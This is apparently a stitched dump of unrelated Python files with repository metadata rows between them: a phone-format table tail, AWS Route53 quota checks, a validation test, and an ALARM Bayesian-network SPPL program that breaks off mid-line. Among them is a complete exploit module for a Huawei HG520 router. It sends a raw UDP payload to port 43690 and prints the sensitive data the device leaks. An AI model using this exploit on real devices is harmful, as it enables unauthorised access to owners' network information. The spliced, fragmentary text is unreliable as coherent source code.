| 104.2 | 417 | 0.591171 | 95 | 521 | 3.147368 | 0.357895 | 0.033445 | 0.200669 | 0.090301 | 0.411371 | 0.411371 | 0.411371 | 0.411371 | 0.411371 | 0.411371 | 0 | 0.134694 | 0.059501 | 521 | 4 | 418 | 130.25 | 0.47551 | 0.103647 | 0 | 0 | 1 | 0.5 | 0.425163 | 0.353579 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
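Each NumberFormat above pairs a capturing regex with a "\1 \2 \3" replacement, so a pattern can be exercised directly with re. A quick sketch (the example number is made up):

import re

nf = PHONE_ALT_FORMAT_358[0]
assert re.fullmatch(nf.pattern, "91234567")       # 1 + 3 + 4 digits, leading 9
print(re.sub(nf.pattern, nf.format, "91234567"))  # -> "9 123 4567"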
ec9d0f99cec288b4703a5082216ca420cd9d2ebe | 4,868 | py | Python | aws_quota/check/route53.py | yanbinren/aws-quota-checker | 582a440e21d5847550732c9cbd8425d3199457ef | [
"MIT"
] | 43 | 2021-02-25T00:53:24.000Z | 2022-02-25T17:38:24.000Z | aws_quota/check/route53.py | yanbinren/aws-quota-checker | 582a440e21d5847550732c9cbd8425d3199457ef | [
"MIT"
] | 25 | 2021-02-24T22:47:29.000Z | 2022-02-14T21:04:26.000Z | aws_quota/check/route53.py | yanbinren/aws-quota-checker | 582a440e21d5847550732c9cbd8425d3199457ef | [
"MIT"
] | 9 | 2021-02-26T21:01:33.000Z | 2022-01-18T08:25:33.000Z | from aws_quota.exceptions import InstanceWithIdentifierNotFound
import typing

import boto3

from .quota_check import InstanceQuotaCheck, QuotaCheck, QuotaScope


class HostedZoneCountCheck(QuotaCheck):
    key = "route53_hosted_zone_count"
    description = "Route53 Hosted Zones per Account"
    scope = QuotaScope.ACCOUNT

    @property
    def maximum(self):
        return self.boto_session.client('route53').get_account_limit(Type='MAX_HOSTED_ZONES_BY_OWNER')['Limit']['Value']

    @property
    def current(self):
        return self.boto_session.client('route53').get_account_limit(Type='MAX_HOSTED_ZONES_BY_OWNER')['Count']


class HealthCheckCountCheck(QuotaCheck):
    key = "route53_health_check_count"
    description = "Route53 Health Checks per Account"
    scope = QuotaScope.ACCOUNT

    @property
    def maximum(self):
        return self.boto_session.client('route53').get_account_limit(Type='MAX_HEALTH_CHECKS_BY_OWNER')['Limit']['Value']

    @property
    def current(self):
        return self.boto_session.client('route53').get_account_limit(Type='MAX_HEALTH_CHECKS_BY_OWNER')['Count']


class ReusableDelegationSetCountCheck(QuotaCheck):
    key = "route53_reusable_delegation_set_count"
    description = "Route53 Reusable Delegation Sets per Account"
    scope = QuotaScope.ACCOUNT

    @property
    def maximum(self):
        return self.boto_session.client('route53').get_account_limit(Type='MAX_REUSABLE_DELEGATION_SETS_BY_OWNER')['Limit']['Value']

    @property
    def current(self):
        return self.boto_session.client('route53').get_account_limit(Type='MAX_REUSABLE_DELEGATION_SETS_BY_OWNER')['Count']


class TrafficPolicyCountCheck(QuotaCheck):
    key = "route53_traffic_policy_count"
    description = "Route53 Traffic Policies per Account"
    scope = QuotaScope.ACCOUNT

    @property
    def maximum(self):
        return self.boto_session.client('route53').get_account_limit(Type='MAX_TRAFFIC_POLICIES_BY_OWNER')['Limit']['Value']

    @property
    def current(self):
        return self.boto_session.client('route53').get_account_limit(Type='MAX_TRAFFIC_POLICIES_BY_OWNER')['Count']


class TrafficPolicyInstanceCountCheck(QuotaCheck):
    key = "route53_traffic_policy_instance_count"
    description = "Route53 Traffic Policy Instances per Account"
    scope = QuotaScope.ACCOUNT

    @property
    def maximum(self):
        return self.boto_session.client('route53').get_account_limit(Type='MAX_TRAFFIC_POLICY_INSTANCES_BY_OWNER')['Limit']['Value']

    @property
    def current(self):
        return self.boto_session.client('route53').get_account_limit(Type='MAX_TRAFFIC_POLICY_INSTANCES_BY_OWNER')['Count']


class RecordsPerHostedZoneCheck(InstanceQuotaCheck):
    key = "route53_records_per_hosted_zone"
    description = "Records per Route53 Hosted Zone"
    instance_id = 'Hosted Zone ID'

    @staticmethod
    def get_all_identifiers(session: boto3.Session) -> typing.List[str]:
        return [zone['Id'] for zone in session.client('route53').list_hosted_zones()['HostedZones']]

    @property
    def maximum(self):
        try:
            return self.boto_session.client('route53').get_hosted_zone_limit(Type='MAX_RRSETS_BY_ZONE', HostedZoneId=self.instance_id)['Limit']['Value']
        except self.boto_session.client('route53').exceptions.NoSuchHostedZone as e:
            raise InstanceWithIdentifierNotFound(self) from e

    @property
    def current(self):
        try:
            return self.boto_session.client('route53').get_hosted_zone_limit(Type='MAX_RRSETS_BY_ZONE', HostedZoneId=self.instance_id)['Count']
        except self.boto_session.client('route53').exceptions.NoSuchHostedZone as e:
            raise InstanceWithIdentifierNotFound(self) from e


class AssociatedVpcHostedZoneCheck(InstanceQuotaCheck):
    key = "route53_vpcs_per_hosted_zone"
    description = "Associated VPCs per Route53 Hosted Zone"
    instance_id = 'Hosted Zone ID'

    @staticmethod
    def get_all_identifiers(session: boto3.Session) -> typing.List[str]:
        return [zone['Id'] for zone in session.client('route53').list_hosted_zones()['HostedZones'] if zone['Config']['PrivateZone']]

    @property
    def maximum(self):
        try:
            return self.boto_session.client('route53').get_hosted_zone_limit(Type='MAX_VPCS_ASSOCIATED_BY_ZONE', HostedZoneId=self.instance_id)['Limit']['Value']
        except self.boto_session.client('route53').exceptions.NoSuchHostedZone as e:
            raise InstanceWithIdentifierNotFound(self) from e

    @property
    def current(self):
        try:
            return self.boto_session.client('route53').get_hosted_zone_limit(Type='MAX_VPCS_ASSOCIATED_BY_ZONE', HostedZoneId=self.instance_id)['Count']
        except self.boto_session.client('route53').exceptions.NoSuchHostedZone as e:
            raise InstanceWithIdentifierNotFound(self) from e
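# Hedged usage sketch: the boto3 call these checks wrap, runnable on its own
# (assumes AWS credentials are configured in the environment).
if __name__ == "__main__":
    resp = boto3.Session().client('route53').get_account_limit(Type='MAX_HOSTED_ZONES_BY_OWNER')
    print(resp['Count'], '/', resp['Limit']['Value'])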
| 39.577236 | 161 | 0.737675 | 572 | 4,868 | 6.017483 | 0.13986 | 0.075537 | 0.116212 | 0.10982 | 0.754794 | 0.735619 | 0.735619 | 0.735619 | 0.735619 | 0.735619 | 0 | 0.017283 | 0.156122 | 4,868 | 122 | 162 | 39.901639 | 0.820594 | 0 | 0 | 0.554348 | 0 | 0 | 0.243426 | 0.117913 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.043478 | 0.130435 | 0.695652 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
ecc0a4b5581ed06a8d3a861f59de2f95f92baf7f | 6,393 | py | Python | maza/modules/exploits/routers/huawei/hg520_info_disclosure.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | 2 | 2020-02-06T20:24:31.000Z | 2022-03-08T19:07:16.000Z | maza/modules/exploits/routers/huawei/hg520_info_disclosure.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | null | null | null | maza/modules/exploits/routers/huawei/hg520_info_disclosure.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | null | null | null | from maza.core.exploit import *
from maza.core.udp.udp_client import UDPClient


class Exploit(UDPClient):
    __info__ = {
        "name": "Huawei HG520 Information Disclosure",
        "description": "Module exploits Huawei EchoLife HG520 information disclosure vulnerability. "
                       "If the target is vulnerable it is possible to retrieve sensitive information.",
        "authors": (
            "hkm",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/12298/",
        ),
        "devices": (
            "Huawei HG520",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(43690, "Target port")

    def __init__(self):
        self.payload = (
b"\x00\x01\x00\x00\x0e\x00\xeb\x03\x7f\x0a\x5f\x00\x10\x00\x02\x00\x13\x00\x00\x00\x50\x02\x00\x00\xe0\xf4\x12\x00\xb0\xaa\x19\x00"
b"\x18\x87\x15\x00\x84\xfb\x12\x00\x00\x00\x00\x00\x78\x76\x4b\x02\xa8\x87\xec\x01\x00\x00\x00\x00\x38\x12\x19\x00\x10\xf5\x12\x00"
b"\x32\x00\x00\x00\x34\x60\x5d\x77\x00\x00\x00\x00\x84\xfb\x12\x00\x01\x00\x00\x00\xb8\x88\x24\x00\xf8\x8f\x19\x00\x0d\x00\x00\x00"
b"\x18\x94\x19\x00\xf8\x98\x19\x00\x74\xf4\x12\x00\x84\xf6\x12\x00\x4c\xf7\x12\x00\x00\xe9\x91\x7c\x10\x6f\x94\x7c\x00\x00\xff\xff"
b"\xae\x2c\x92\x7c\xe4\x2c\x92\x7c\x51\x2d\x92\x7c\x58\x2d\x92\x7c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\xf7\x12\x00"
b"\x44\xf5\x12\x00\xb0\x65\x92\x7c\xf8\xf7\x12\x00\x00\xe9\x91\x7c\x60\x2d\x92\x7c\xff\xff\xff\xff\x58\x2d\x92\x7c\x12\x66\x92\x7c"
b"\x01\x00\x00\x00\x76\x02\x48\x0d\xee\x64\x92\x7c\x00\x00\x00\x00\x9c\x70\x40\x00\x00\x00\x00\x00\x34\x60\x5d\x77\x30\x28\x1f\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x70\x2f\x15\x00\x78\x01\x15\x00\x00\x00\x00\x00\x78\x2f\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x54\xf8\x12\x00\xa8\x87\xec\x01\x50\xf8\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x76\x02\x48\x0d\x00\x00\x08\x02"
b"\xe4\xf5\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\xf8\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x5c\xf6\x12\x00\x0d\x00\x00\x00\xa2\x6f\x94\x7c\xf8\x98\x19\x00\x78\x76\x4b\x02\xd8\x93\x19\x00"
b"\x60\x90\x19\x00\x0d\x00\x00\x00\xf8\x8f\x19\x00\x84\xfb\x12\x00\x28\xf6\x12\x00\x30\xd4\x4c\x77\x48\xf7\x12\x00\x00\xe9\x91\x7c"
b"\x94\xf6\x12\x00\x94\xf6\x12\x00\xd8\x93\x19\x00\xec\x73\x94\x7c\x70\xe3\x4b\x02\x00\x00\x00\x00\x00\x00\x15\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x0f\x00\x41\x00\x13\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\xf8\x98\x19\x00\xb4\xf9\x12\x00\xf8\x8f\x19\x00"
b"\x58\xf7\x12\x00\x3d\x00\x92\x7c\xf6\x89\xec\x01\x00\x00\x00\x00\xe8\x06\x02\x00\x54\xfc\x12\x00\x01\x00\x00\x00\x01\x00\x00\x00"
b"\x00\x00\x00\x00\x12\xe1\xf8\x09\x7d\x0b\x00\x00\x72\xab\x56\x48\x3f\xe1\xbe\x07\x15\x04\x92\x7c\x1e\x04\x92\x7c\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\xe0\xfd\x7f\xeb\x50\xd7\xc6\x1a\x00\x00\x00\x00\xe0\xfd\x7f\x00\x10\x91\x7c\x00\x00\x00\x00\x00\x00\x01\x00"
b"\x00\xe0\xfd\x7f\x5c\xf7\x12\x00\xe6\x45\x92\x7c\x40\x04\x92\x7c\x00\xd6\x98\x7c\x48\xf7\x12\x00\x40\x12\x19\x00\x8a\x74\x94\x7c"
b"\x2c\xf7\x12\x00\xa8\x87\xec\x01\x00\x00\x00\x00\x00\x00\x15\x00\x0e\x00\xeb\x03\x80\x0a\x5f\x00\x64\x46\x00\x10\xfe\xf7\x12\x00"
b"\xb0\x44\x00\x10\x04\x00\x00\x00\x8c\xf7\x12\x00\xd3\x7e\x92\x7c\xfe\xf7\x12\x00\x31\x00\x00\x00\x00\x00\x00\x10\xa0\x45\x00\x10"
b"\x64\x46\x00\x10\x00\x00\x00\x00\x01\x00\x00\x00\xfc\xf7\x12\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x10\xe0\x00\x00\x10"
b"\x64\xf7\x12\x00\x01\x00\x00\x00\x9c\xf7\x12\x00\x65\x03\x92\x7c\x00\x00\x00\x10\x00\x00\x00\x00\x58\xf8\x12\x00\x9a\x7d\x92\x7c"
b"\x00\x00\x00\x10\xfe\xf7\x12\x00\xf8\xf7\x12\x00\xf8\xf7\x12\x00\xfe\xf7\x12\x00\x3f\x7e\x92\x7c\x78\xb1\x98\x7c\xe9\x7d\x92\x7c"
b"\x8c\x70\x40\x00\x9c\x70\x40\x00\xff\xff\x00\x00\x00\xd0\xfd\x7f\xe0\x47\x25\x00\x08\xe4\x80\x7c\xb0\x44\x00\x10\x6c\xe4\x80\x7c"
b"\xf0\x47\x25\x00\xa8\xf8\x12\x00\x00\x00\x00\x10\x00\x00\x00\x00\xfc\xf7\x12\x00\xfc\xf7\x12\x00\x00\x00\x00\x00\xfe\x04\x00\x00"
b"\xd0\x41\x25\x00\x00\x1b\x00\x10\x00\x00\x67\x65\x74\x41\x64\x73\x6c\x53\x74\x61\x74\x75\x73\x00\x3d\x00\x92\x7c\xea\x1b\x80\x7c"
b"\x00\x00\x15\x00\x00\x00\x00\x00\xfa\x1b\x80\x7c\x64\x5d\x47\x00\x9c\x70\x40\x00\x9f\xac\x80\x7c\x4e\x02\x50\x02\xa8\x87\xec\x01"
b"\x16\x00\x18\x00\x00\xdc\xfd\x7f\xef\xfa\x00\x00\xb4\xf7\x12\x00\xa8\x87\xec\x01\xa8\xf9\x12\x00\x00\xe9\x91\x7c\xf0\x7d\x92\x7c"
b"\xff\xff\xff\xff\xe9\x7d\x92\x7c\xa0\x7e\x92\x7c\x00\x00\x00\x10\x94\xf8\x12\x00\x00\x00\x00\x00\xa8\xf8\x12\x00\x01\x00\x00\x00"
b"\x9c\xf8\x12\x00\x6e\xae\x80\x7c\x9c\xf8\x12\x00\x80\xae\x80\x7c\x00\x00\x00\x10\x00\x00\x00\x00\x64\x5d\x47\x00\x9f\xac\x80\x7c"
b"\x0d\x00\x0e\x00\x8c\x70\x40\x00\xc4\xf8\x12\x00\xd8\xa0\x00\x66\x00\x00\x00\x10\x00\x1b\x00\x10\x84\xfb\x12\x00\x54\xfc\x12\x00"
b"\x01\x00\x00\x00\x68\xf8\x16\x00\xdc\xf8\x12\x00\x44\x4a\x0f\x77\xf4\xf8\x12\x00\x3b\xa0\x00\x66\x9c\x70\x40\x00\x01\x00\x00\x00"
b"\xec\xf8\x12\x00\xf0\xf8\x12\x00\xe8\xf8\x12\x00\x84\xfb\x12\x00\x54\xfc\x12\x00\x84\xfb\x12\x00\x00\x1b\x00\x10\x00\x00\x00\x00"
b"\xb8\xf9\x12\x00\xcb\x70\x40\x00\x9c\x70\x40\x00"
        )
        self.content = ""

    def run(self):
        if self.check():
            print_status("Target returned data")
            print_info(self.content)
        else:
            print_error("Exploit failed - device does not appear to be vulnerable")

    @mute
    def check(self):
        udp_client = self.udp_create()
        udp_client.send(self.payload)
        response = udp_client.recv(1024)
        udp_client.close()

        if response:
            self.content = response
            return True  # target is vulnerable

        return False  # target is not vulnerable
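# Hedged standalone sketch: the same UDP probe using only the standard
# library; `payload` stands in for the byte string built in __init__ above.
import socket

def probe(host: str, payload: bytes, port: int = 43690, timeout: float = 5.0) -> bytes:
    """Send the probe datagram and return the reply (empty bytes on timeout)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(payload, (host, port))
        return sock.recv(1024)  # a non-empty reply suggests the device leaks data
    except socket.timeout:
        return b""
    finally:
        sock.close()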
| 75.211765 | 143 | 0.651494 | 1,284 | 6,393 | 3.23053 | 0.176791 | 0.383317 | 0.403568 | 0.358727 | 0.451302 | 0.371022 | 0.288091 | 0.178881 | 0.128014 | 0.101977 | 0 | 0.338262 | 0.143125 | 6,393 | 84 | 144 | 76.107143 | 0.418949 | 0.013765 | 0 | 0.04 | 0 | 0.466667 | 0.766032 | 0.702063 | 0 | 1 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.026667 | 0 | 0.146667 | 0.04 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ece0cecc8cbe57e2b163aea0d6f05a998776b2b5 | 7,166 | py | Python | tests/unit/dataactvalidator/test_c23_award_financial_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | 1 | 2018-10-29T12:54:44.000Z | 2018-10-29T12:54:44.000Z | tests/unit/dataactvalidator/test_c23_award_financial_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | null | null | null | tests/unit/dataactvalidator/test_c23_award_financial_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | null | null | null | from random import choice
from string import ascii_uppercase, ascii_lowercase, digits

from tests.unit.dataactcore.factories.staging import AwardFinancialFactory, AwardProcurementFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns

_FILE = 'c23_award_financial_2'


def test_column_headers(database):
    expected_subset = {"row_number", "transaction_obligated_amou_sum", "federal_action_obligation_sum"}
    actual = set(query_columns(_FILE, database))
    assert expected_subset <= actual


def test_success(database):
    """ Test that rows whose transaction_obligated_amou sum matches the negated federal_action_obligation sum
    pass the rule. Only finds rows with matching piid AND parent_award_id from AwardFinancialFactory and
    doesn't care about rows with a null piid or parent_award_id in AwardFinancialFactory """

    # Create a 12 character random parent_award_id
    parent_award_id = ''.join(choice(ascii_uppercase + ascii_lowercase + digits) for _ in range(12))
    parent_award_id_two = ''.join(choice(ascii_uppercase + ascii_lowercase + digits) for _ in range(12))
    parent_award_id_three = ''.join(choice(ascii_uppercase + ascii_lowercase + digits) for _ in range(12))

    first_parent_award_id_row_one = AwardFinancialFactory(transaction_obligated_amou=1100, piid="1234",
                                                          parent_award_id=parent_award_id,
                                                          allocation_transfer_agency=None)
    first_parent_award_id_row_two = AwardFinancialFactory(transaction_obligated_amou=11, piid="1234",
                                                          parent_award_id=parent_award_id,
                                                          allocation_transfer_agency=None)
    first_parent_award_id_row_three = AwardFinancialFactory(transaction_obligated_amou=11, piid=None,
                                                            parent_award_id=parent_award_id,
                                                            allocation_transfer_agency=None)
    first_parent_award_id_row_four = AwardFinancialFactory(transaction_obligated_amou=11, piid='',
                                                           parent_award_id=parent_award_id,
                                                           allocation_transfer_agency=None)
    # And add a row for a different parent_award_id
    second_parent_award_id_row_one = AwardFinancialFactory(transaction_obligated_amou=9999, piid="1234",
                                                           parent_award_id=parent_award_id_two,
                                                           allocation_transfer_agency=None)
    third_parent_award_id_row_one = AwardFinancialFactory(transaction_obligated_amou=8888, piid="1234",
                                                          parent_award_id=parent_award_id_three,
                                                          allocation_transfer_agency=123)

    first_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id, piid="1234",
                                           federal_action_obligation=-1100)
    second_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id, piid="1234", federal_action_obligation=-10)
    third_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id, piid="1234", federal_action_obligation=-1)
    other_parent_award_id_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id_two, piid="1234",
                                                           federal_action_obligation=-9999)
    third_parent_award_id_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id_three, piid="1234",
                                                           federal_action_obligation=-9999)

    errors = number_of_errors(_FILE, database, models=[first_parent_award_id_row_one, first_parent_award_id_row_two,
                                                       first_parent_award_id_row_three, first_parent_award_id_row_four,
                                                       second_parent_award_id_row_one, first_ap_row, second_ap_row,
                                                       third_ap_row, other_parent_award_id_ap_row,
                                                       third_parent_award_id_row_one, third_parent_award_id_ap_row])
    assert errors == 0


def test_failure(database):
    """ Test that a mismatch between the transaction_obligated_amou sum and the negated
    federal_action_obligation sum is an error. Only finds rows with matching piid AND parent_award_id
    from AwardFinancialFactory and doesn't care about rows with null parent_award_id in
    AwardFinancialFactory """

    # Create a 12 character random parent_award_id
    parent_award_id = ''.join(choice(ascii_uppercase + ascii_lowercase + digits) for _ in range(12))
    parent_award_id_two = ''.join(choice(ascii_uppercase + ascii_lowercase + digits) for _ in range(12))

    first_parent_award_id_row_one = AwardFinancialFactory(transaction_obligated_amou=1100, piid="1234",
                                                          parent_award_id=parent_award_id,
                                                          allocation_transfer_agency=None)
    first_parent_award_id_row_two = AwardFinancialFactory(transaction_obligated_amou=11, piid="1234",
                                                          parent_award_id=parent_award_id,
                                                          allocation_transfer_agency=None)
    first_parent_award_id_row_three = AwardFinancialFactory(transaction_obligated_amou=11, piid="1234",
                                                            parent_award_id=None,
                                                            allocation_transfer_agency=None)
    # And add a row that is wrong
    second_parent_award_id_row_one = AwardFinancialFactory(transaction_obligated_amou=9999, piid="1234",
                                                           parent_award_id=parent_award_id_two,
                                                           allocation_transfer_agency=None)

    first_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id, piid="1234",
                                           federal_action_obligation=-1100)
    second_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id, piid="1234", federal_action_obligation=-10)
    third_ap_row = AwardProcurementFactory(parent_award_id="1234", piid="1234", federal_action_obligation=-10)
    other_parent_award_id_ap_row = AwardProcurementFactory(parent_award_id=parent_award_id_two, piid="1234",
                                                           federal_action_obligation=-1111)

    errors = number_of_errors(_FILE, database, models=[first_parent_award_id_row_one, first_parent_award_id_row_two,
                                                       first_parent_award_id_row_three, second_parent_award_id_row_one,
                                                       first_ap_row, second_ap_row, third_ap_row,
                                                       other_parent_award_id_ap_row])
    assert errors == 2
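# These tests run under pytest with the suite's `database` fixture, e.g.:
#   pytest tests/unit/dataactvalidator/test_c23_award_financial_2.py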
| 77.053763 | 120 | 0.61736 | 766 | 7,166 | 5.302872 | 0.138381 | 0.200394 | 0.236829 | 0.078779 | 0.859921 | 0.851551 | 0.796652 | 0.770064 | 0.749877 | 0.734121 | 0 | 0.031439 | 0.329752 | 7,166 | 92 | 121 | 77.891304 | 0.814283 | 0.093637 | 0 | 0.549296 | 0 | 0 | 0.025128 | 0.012409 | 0 | 0 | 0 | 0 | 0.042254 | 1 | 0.042254 | false | 0 | 0.056338 | 0 | 0.098592 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ece95efebace60552d61055d0bc2a2a7699940a6 | 73,277 | py | Python | example/alarm_benchmark.py | shiruizhao/swift | 2026acce35f0717c7a3e9dc522ff1c69f8dc3227 | [
"BSD-4-Clause-UC",
"BSD-4-Clause"
] | null | null | null | example/alarm_benchmark.py | shiruizhao/swift | 2026acce35f0717c7a3e9dc522ff1c69f8dc3227 | [
"BSD-4-Clause-UC",
"BSD-4-Clause"
] | null | null | null | example/alarm_benchmark.py | shiruizhao/swift | 2026acce35f0717c7a3e9dc522ff1c69f8dc3227 | [
"BSD-4-Clause-UC",
"BSD-4-Clause"
] | null | null | null | from sppl.compilers.ast_to_spe import Id
from sppl.compilers.ast_to_spe import IfElse
from sppl.compilers.ast_to_spe import Sample
from sppl.compilers.ast_to_spe import Sequence
from sppl.compilers.sppl_to_python import SPPL_Compiler
from sppl.distributions import atomic
from sppl.distributions import choice
from sppl.distributions import uniform
from sppl.math_util import allclose
from sppl.sets import Interval
from sppl.spe import ExposedSumSPE
import os
import time
import numpy as np
isclose = lambda a, b: abs(a - b) < 1e-10
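# The SPPL program below encodes the ALARM Bayesian network: each variable is
# a choice() distribution whose weights are the CPT row selected by nested
# if/elif/else over the variable's parents.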
data = '''
ANAPHYLAXIS ~= choice({'TRUE' : 0.01,'FALSE' : 0.99})
DISCONNECT ~= choice({'TRUE' : 0.1,'FALSE' : 0.9})
ERRCAUTER ~= choice({'TRUE' : 0.1,'FALSE' : 0.9})
ERRLOWOUTPUT ~= choice({'TRUE' : 0.05,'FALSE' : 0.95})
FIO2 ~= choice({'LOW' : 0.05,'NORMAL' : 0.95})
HYPOVOLEMIA ~= choice({'TRUE' : 0.2,'FALSE' : 0.8})
INSUFFANESTH ~= choice({'TRUE' : 0.1,'FALSE' : 0.9})
INTUBATION ~= choice({'NORMAL' : 0.92,'ESOPHAGEAL' : 0.03,'ONESIDED' : 0.05})
KINKEDTUBE ~= choice({'TRUE' : 0.04,'FALSE' : 0.96})
LVFAILURE ~= choice({'TRUE' : 0.05,'FALSE' : 0.95})
MINVOLSET ~= choice({'LOW' : 0.05,'NORMAL' : 0.9,'HIGH' : 0.05})
PULMEMBOLUS ~= choice({'TRUE' : 0.01,'FALSE' : 0.99})
if (INTUBATION == 'NORMAL'):
    if (PULMEMBOLUS == 'TRUE'):
        SHUNT ~= choice({'NORMAL' : 0.1, 'HIGH' : 0.9})
    else:
        SHUNT ~= choice({'NORMAL' : 0.95, 'HIGH' : 0.050000000000000044})
elif(INTUBATION == 'ESOPHAGEAL'):
    if(PULMEMBOLUS == 'TRUE'):
        SHUNT ~= choice({'NORMAL' : 0.1, 'HIGH' : 0.9})
    else:
        SHUNT ~= choice({'NORMAL' : 0.95, 'HIGH' : 0.050000000000000044})
else:
    if(PULMEMBOLUS == 'TRUE'):
        SHUNT ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
    else:
        SHUNT ~= choice({'NORMAL' : 0.05, 'HIGH' : 0.95})
if (HYPOVOLEMIA == 'TRUE'):
    if (LVFAILURE == 'TRUE'):
        STROKEVOLUME ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        STROKEVOLUME ~= choice({'LOW' : 0.5, 'NORMAL' : 0.49, 'HIGH' : 0.010000000000000009})
else:
    if(LVFAILURE == 'TRUE'):
        STROKEVOLUME ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
    else:
        STROKEVOLUME ~= choice({'LOW' : 0.05, 'NORMAL' : 0.9, 'HIGH' : 0.04999999999999993})
if (ANAPHYLAXIS == 'TRUE'):
    TPR ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
    TPR ~= choice({'LOW' : 0.3, 'NORMAL' : 0.4, 'HIGH' : 0.30000000000000004})
if (MINVOLSET == 'LOW'):
    VENTMACH ~= choice({'ZERO' : 0.05, 'LOW' : 0.93, 'NORMAL' : 0.01, 'HIGH' : 0.009999999999999898})
elif(MINVOLSET == 'NORMAL'):
    VENTMACH ~= choice({'ZERO' : 0.05, 'LOW' : 0.01, 'NORMAL' : 0.93, 'HIGH' : 0.009999999999999898})
else:
    VENTMACH ~= choice({'ZERO' : 0.05, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.9299999999999999})
if (DISCONNECT == 'TRUE'):
    if (VENTMACH == 'ZERO'):
        VENTTUBE ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTMACH == 'LOW'):
        VENTTUBE ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTMACH == 'NORMAL'):
        VENTTUBE ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        VENTTUBE ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.97, 'HIGH' : 0.010000000000000009})
else:
    if(VENTMACH == 'ZERO'):
        VENTTUBE ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTMACH == 'LOW'):
        VENTTUBE ~= choice({'ZERO' : 0.97, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    elif(VENTMACH == 'NORMAL'):
        VENTTUBE ~= choice({'ZERO' : 0.01, 'LOW' : 0.97, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
    else:
        VENTTUBE ~= choice({'ZERO' : 0.01, 'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.97})
if (LVFAILURE == 'TRUE'):
